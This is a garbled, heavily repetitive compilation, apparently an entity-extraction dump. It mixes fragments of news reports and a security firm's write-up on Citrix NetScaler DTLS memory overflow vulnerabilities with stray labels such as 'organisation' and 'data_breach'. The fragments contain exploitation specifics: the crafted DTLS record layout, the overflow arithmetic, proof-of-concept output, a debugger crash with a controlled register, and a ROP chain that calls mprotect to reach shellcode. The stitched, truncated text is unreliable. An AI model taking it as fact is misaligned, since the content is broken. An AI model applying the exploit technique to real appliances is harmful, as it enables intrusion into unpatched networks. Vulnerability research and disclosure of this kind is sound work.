Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
infrastructure
13.1-37
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
infrastructure
13.1
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
infrastructure
37.282
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
infrastructure
14.1 FIPS
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTL…
infrastructure
73.37 FIPS
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
financial
73.37 NetScaler
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
infrastructure
13.1.37
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
infrastructure
13.1 FIPS
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTL…
Fixes are also available for the 14.1-FIPS, 13.1-FIPS and 13.1-NDcPP branches.
organisation
SAML Identity Provider (IdP
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
infrastructure
14.1
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
organisation
NetScaler Gateway 14.1
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
organisation
NetScaler ADC FIPS
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
financial
14.1 NetScaler ADC
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
infrastructure
73.41 NetScaler ADC FIPS
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
organisation
FCEB
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
infrastructure
Cursor
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
NULL; nsb = nsb->next) {
+ if (nsb->length > space_left) {
+ reject_message();
+ return;
+ }
memcpy(cursor, nsb->data, nsb->length);
cursor += nsb->length;
+ space_left -= nsb->length;
}
Step 1: Pass the DTLS Cookie Check
organisation
@@
copy_saved_header(scratch
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
organisation
scratch + saved_header_length
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
infrastructure
13.1-63
The builds 14.1-73.32 and 13.1-63.21, which fixed the previously disclosed authentication-bypass vulnerability
CVE-2026-19490
, are still within the affected range for these new flaws.
Citrix has not said whether appliances on the August builds, 14.1-73.32 and 13.1-63.21, or any newer builds, are affected by the new flaws.
organisation
CVE-2026-88779
CVE-2026-88779 is a memory overflow vulnerability in Citrix NetScaler ADC and Gateway that can cause denial-of-service under specific conditions.
organisation
Chase XOR Team
Citrix has credited Michael Tucker, Chew Keong Tan, and Alex Bernier of the JPMorgan Chase XOR Team, along with Maxim Suhanov, for discovering and reporting the flaw.
Michael Tucker, Chew Keong Tan and Alex Bernier of the JPMorgan Chase XOR Team, and Maxim Suhanov reported the vulnerability to the vendor.
organisation
IdP
Successful exploitation hinges on the NetScaler deployments being configured as a SAML identity provider (IdP) or service provider (SP).
organisation
KeV
The U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
a Citrix NetScaler flaw tracked as
CVE-2026-88779
(CVSS score of 8.7), to its
Known Exploited Vulnerabilities (KEV) catalog
.
CISA rushed to
add
CVE-2026-88771 and CVE-2026-88772 to its KEV catalog.
This week, CISA
added
the flaw CVE-2026-88779 to its KeV catalog.
data_breach
1 byte
The issue, per
watchTowr
, is that NetScaler implicitly trusts the declared fragment size in the DTLS handshake header's fragment_length field (i.e., 1 byte), while the header simultaneously claims that the complete message, as denoted by the length field, is 120 bytes long.
Their offsets cover the whole message:
record 1 fragment_offset = 0
record 2 fragment_offset = 1
record 3 fragment_offset = 2
...
When a record carries handshake data, that data begins with a further 12-byte header describing a handshake fragment:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Content Type | Version (DTLS)
data_breach
120 bytes
The issue, per
watchTowr
, is that NetScaler implicitly trusts the declared fragment size in the DTLS handshake header's fragment_length field (i.e., 1 byte), while the header simultaneously claims that the complete message, as denoted by the length field, is 120 bytes long.
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
"The malicious records tell the reassembly code that each record supplies only one byte of a 120-byte handshake message," Kheirkhah said.
"For example, a 120-byte handshake message can arrive as 120 fragments.
Once every position has arrived, the server considers the 120-byte message complete.
After 120 records, the handshake message is considered complete, but its NSB chain contains about 174 KB of data.
For example, a 120-byte handshake message can arrive as 120 fragments.
The malicious records tell the reassembly code that each record supplies only one byte of a 120-byte handshake message.
Send the 120 malicious records on that socket.
It claims two things at once:
length=120
: the complete message is 120 bytes long.
That makes it step over the 120-byte primary area and find the hidden header.
record 120 fragment_offset = 119
After record 120, every position from 0 through 119 has been supplied, so NSPPE marks the 120-byte handshake message as complete.
[+] association ready: 3 server datagrams
[*] sending 120 records (176640 bytes)...
organisation
PoC
The disclosure comes a day after the preemptive exposure management company
released
a proof-of-concept (PoC) for CVE-2026-88771, which has been abused alongside CVE-2026-88772 in real-world attacks.
organisation
NetScaler CVE-2026-88772
Citrix NetScaler CVE-2026-88772 Exploit Details Show Pre-Auth Path to Shellcode Execution.
organisation
the Datagram Transport Layer Security
The vulnerability, tracked as
CVE-2026-88772
(CVSS score: 9.5), has been described as a memory overflow bug in the Datagram Transport Layer Security (DTLS) protocol handling that's rooted in the NetScaler Packet Processing Engine (NSPPE).
organisation
the NetScaler Packet Processing Engine
The vulnerability, tracked as
CVE-2026-88772
(CVSS score: 9.5), has been described as a memory overflow bug in the Datagram Transport Layer Security (DTLS) protocol handling that's rooted in the NetScaler Packet Processing Engine (NSPPE).
organisation
NSPPE
The vulnerability, tracked as
CVE-2026-88772
(CVSS score: 9.5), has been described as a memory overflow bug in the Datagram Transport Layer Security (DTLS) protocol handling that's rooted in the NetScaler Packet Processing Engine (NSPPE).
Once DTLS reassembly finishes, an NSPPE function stitches the NSB chain into a single fixed buffer.
organisation
PreAuth
/ \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88772.py
(*) Citrix Netscaler DTLS PreAuth buffer overflow to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs:
data_breach
7 bytes
[CVE-2026-88772]
[*] building payload for '/tmp/watchTowr'
[+] content size: 7 bytes
[*] connecting to DTLS gateway...
organisation
Citrix NetScaler Gateway
“CVE-2026-88779 is a memory overflow vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway that can lead to denial-of-service under specific deployment conditions,” reads the
advisory
.
organisation
Identity Provider (IdP
Customers can check their NetScaler configuration to see whether the appliance is set up as a SAML Service Provider (SP) or Identity Provider (IdP).
organisation
SecurityAffairs
Follow me on Twitter:
@securityaffairs
and
Facebook
and
Mastodon
Pierluigi Paganini
(
SecurityAffairs
– hacking, Citrix)
Follow me on Twitter:
@securityaffairs
and
Facebook
and
Mastodon
Pierluigi Paganini
(
SecurityAffairs
– hacking,
CISA
)
organisation
Known Exploited
U.S. CISA adds Citrix NetScaler flaw to its Known Exploited Vulnerabilities catalog.
organisation
Denial of Service
“Citrix has observed targeted attacks on unmitigated NetScaler deployments which can lead to Denial of Service.
organisation
AAA
Exposure depends on the deployment configuration, particularly whether NetScaler uses SAML with Gateway or AAA functionality.
organisation
Citrix NetScaler
CISA’s KEV catalog
currently contains over a dozen Citrix NetScaler vulnerabilities, including the recently added
CVE-2026-19490
and
CVE-2026-8452
.
Several governments sent out urgent warnings this weekend about zero-day vulnerabilities impacting Citrix NetScaler application delivery controllers (ADC) and Gateway devices, which serve as front doors for users connecting to an organization’s environment.
organisation
MDR
Over the weekend, NetScaler administrators
said
on Reddit that their IT suppliers, CERT teams and MDR providers had told them to shut down their appliances immediately, often without explaining why.
organisation
the Dutch National Cyber Security Centre
Some of these warnings traced back to a private pre-notification from the Dutch National Cyber Security Centre (NCSC-NL), which was reportedly shared under TLP:AMBER restrictions.
The Dutch National Cyber Security Centre also sent a pre-notification to organizations in the Netherlands.
organisation
NCSC-NL
Some of these warnings traced back to a private pre-notification from the Dutch National Cyber Security Centre (NCSC-NL), which was reportedly shared under TLP:AMBER restrictions.
organisation
TLP
Some of these warnings traced back to a private pre-notification from the Dutch National Cyber Security Centre (NCSC-NL), which was reportedly shared under TLP:AMBER restrictions.
organisation
NetScalers
Several admins took their NetScalers offline, while others said they had received no official notice.
An administrator posting on
r/Citrix
wrote that their IT supplier's security team had phoned to advise shutting their NetScalers down immediately, without giving details.
data_breach
1,459 bytes
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
"
Each received packet of 1,459 bytes is stored in NetScaler Buffers (NSBs), which is then stitched into a single scratch buffer of only 35,840 bytes.
The two 12-byte headers and their declared fragment sizes add up to the complete 1,459-byte body:
12 + 1 + 12 + 1434 = 1459
At the same time, the bytes actually placed in the packet also add up to 1,459:
12 + 120 + 12 + 1315 = 1459
The first NSB contributes 1,459 bytes.
data_breach
13 byte
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
A single UDP packet can carry one or more DTLS records, and every record opens with a 13-byte header.
= 173652 bytes of NSB data
The function also copies a saved 13-byte DTLS record header:
total copied = 13 + 173652 = 173665 bytes
buffer size = 0x8c00 = 35840 bytes
overflow = 137825 bytes
That is 137,825 bytes spilling past the buffer and into whatever writable
nsppe
data happens to sit next to it.
data_breach
12 byte
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
When a record carries handshake data, that data begins with a further 12-byte header describing a handshake fragment:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Content Type | Version (DTLS)
The two 12-byte headers and their declared fragment sizes add up to the complete 1,459-byte body:
12 + 1 + 12 + 1434 = 1459
At the same time, the bytes actually placed in the packet also add up to 1,459:
12 + 120 + 12 + 1315 = 1459
Each of the other 119 NSBs contributes 1,447 bytes, because its 12-byte primary handshake header is skipped:
1459 + (119 * 1447)
data_breach
2 record
Their offsets cover the whole message:
record 1 fragment_offset = 0
record 2 fragment_offset = 1
record 3 fragment_offset = 2
...
infrastructure
50,000 Devices
50,000 Devices May Still Be Exposed..
organisation
Content Type
When a record carries handshake data, that data begins with a further 12-byte header describing a handshake fragment:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Content Type | Version (DTLS)
organisation
Kheirkhah
"The malicious records tell the reassembly code that each record supplies only one byte of a 120-byte handshake message," Kheirkhah said.
infrastructure
3 server
[+] association ready: 3 server datagrams
[*] sending 120 records (176640 bytes)...
organisation
NetScaler Buffers
"
Each received packet of 1,459 bytes is stored in NetScaler Buffers (NSBs), which is then stitched into a single scratch buffer of only 35,840 bytes.
NetScaler stores received packet data in objects called NSBs, short for NetScaler Buffers.
data_breach
35,840 bytes
"
Each received packet of 1,459 bytes is stored in NetScaler Buffers (NSBs), which is then stitched into a single scratch buffer of only 35,840 bytes.
That buffer is the scratch buffer, and it is tiny:
0x8c00
bytes, or 35,840.
The vulnerable function then copies that entire chain into the 35,840-byte scratch buffer without checking whether it fits.
[6]
At
[1]
, start with 35,840 bytes of free space.
organisation
NSB
"However, NSPPE keeps almost the whole record in an NSB.
Each NSB holds some packet bytes, its length, and a pointer to the next NSB.
organisation
NULL
NULL; nsb = nsb->next) {
+ if (nsb->length > space_left) {
+ reject_message();
+ return;
+ }
memcpy(cursor, nsb->data, nsb->length);
cursor += nsb->length;
+ space_left -= nsb->length;
}
Step 1: Pass the DTLS Cookie Check
infrastructure
8.8
8.8 High
Not reported
The Citrix
advisory
recommends updating to the following fixed versions:
organisation
Preemptive Exposure Management
This research is a glimpse into the capability powering the watchTowr Platform, a
Preemptive Exposure Management
solution.
organisation
The Hacker News
The Hacker News has asked Cloud Software Group, the company that owns Citrix and NetScaler, and watchTowr for comment.
organisation
SSL
It sits in front of an organization's applications and handles load balancing, traffic management, and SSL/TLS termination.
organisation
TLS
DTLS is TLS bolted onto UDP.
organisation
UDP
A single UDP packet can carry one or more DTLS records, and every record opens with a 13-byte header.
data_breach
137,825 bytes
= 173652 bytes of NSB data
The function also copies a saved 13-byte DTLS record header:
total copied = 13 + 173652 = 173665 bytes
buffer size = 0x8c00 = 35840 bytes
overflow = 137825 bytes
That is 137,825 bytes spilling past the buffer and into whatever writable
nsppe
data happens to sit next to it.
data_breach
1,447 bytes
Each of the other 119 NSBs contributes 1,447 bytes, because its 12-byte primary handshake header is skipped:
1459 + (119 * 1447)
organisation
@@
DTLS NSB-chain copy loop @@
+0x143649d mov r15d, 0x8c00 //
organisation
mov r15d
DTLS NSB-chain copy loop @@
+0x143649d mov r15d, 0x8c00 //
organisation
IP
This only proves that the client can receive packets at its IP address; it does not authenticate a user.
organisation
ClientHello
Here is what we do:
Send a small ClientHello.
organisation
RCX
The list-handling code loads this overwritten value into
RCX
and uses it as a destination pointer:
Program received signal SIGSEGV, Segmentation fault.
organisation
gdb
(gdb) x/i $rip
=> 0x000000000143470e: mov %rax,0x20(%rcx)
(gdb) info registers rip rcx
rip 0x143470e 0x143470e
rcx 0x0000414141414141 71748523475265
(gdb) p/x $rcx + 0x20
$1 = 0x0000414141414161
As you can see we crash because the
RCX
register which we have control has an invalid address so when
RAX
is about to be written to
RCX + 0x20
segfault happe…
financial
$1 $ rcx
(gdb) x/i $rip
=> 0x000000000143470e: mov %rax,0x20(%rcx)
(gdb) info registers rip rcx
rip 0x143470e 0x143470e
rcx 0x0000414141414141 71748523475265
(gdb) p/x $rcx + 0x20
$1 = 0x0000414141414161
As you can see we crash because the
RCX
register which we have control has an invalid address so when
RAX
is about to be written to
RCX + 0x20
segfault happen…
organisation
PIE
No RELRO
Stack: No canary found
NX: NX enabled
PIE:
organisation
MB
No PIE (0x400000)
Since there is no PIE, we can use addresses in the 41 MB binary to our advantage (I genuinely do not know how to make this sentence funnier than it already is).
data_breach
41 MB binary
No PIE (0x400000)
Since there is no PIE, we can use addresses in the 41 MB binary to our advantage (I genuinely do not know how to make this sentence funnier than it already is).
organisation
ROP
(gdb) info registers rip rax rsi
rip 0x0000414141414141
rax 0x000000000355d800
rsi 0x000000000355c800
rsp 0x00007fffffffe728
ROP to Shellcode Execution
NX was enabled, so execution could not jump directly into bytes stored in the writable overflow area.
organisation
RDX -> 0x7
…e came up with the following ROP gadget to call mprotect first then jump to our shellcode:
pop rdi ; ret │ RDI -> page to change
pop rsi ; ret │ RSI -> 0x1000
pop rdx ; ret │ RDX -> 0x7 (R | W | X)
mprotect │ mprotect(rdi, rsi, rdx)
shellcode address │ ret -> shellcode
This performs:
mprotect((void *)0x355e000, 0x1000,
PROT_READ | PROT_WRIT…
organisation
|_\
| |_\__ ____\____
organisation
External Attack Surface Management
The
watchTowr Platform
combines
External Attack Surface Management
and
Continuous Automated Red Teaming
to test your defenses against the vulnerabilities and techniques that matter: the ones real attackers are actually exploiting.
data_breach
1,315 remaining bytes
…y handshake header
│ length = 120
│ message_seq = 2
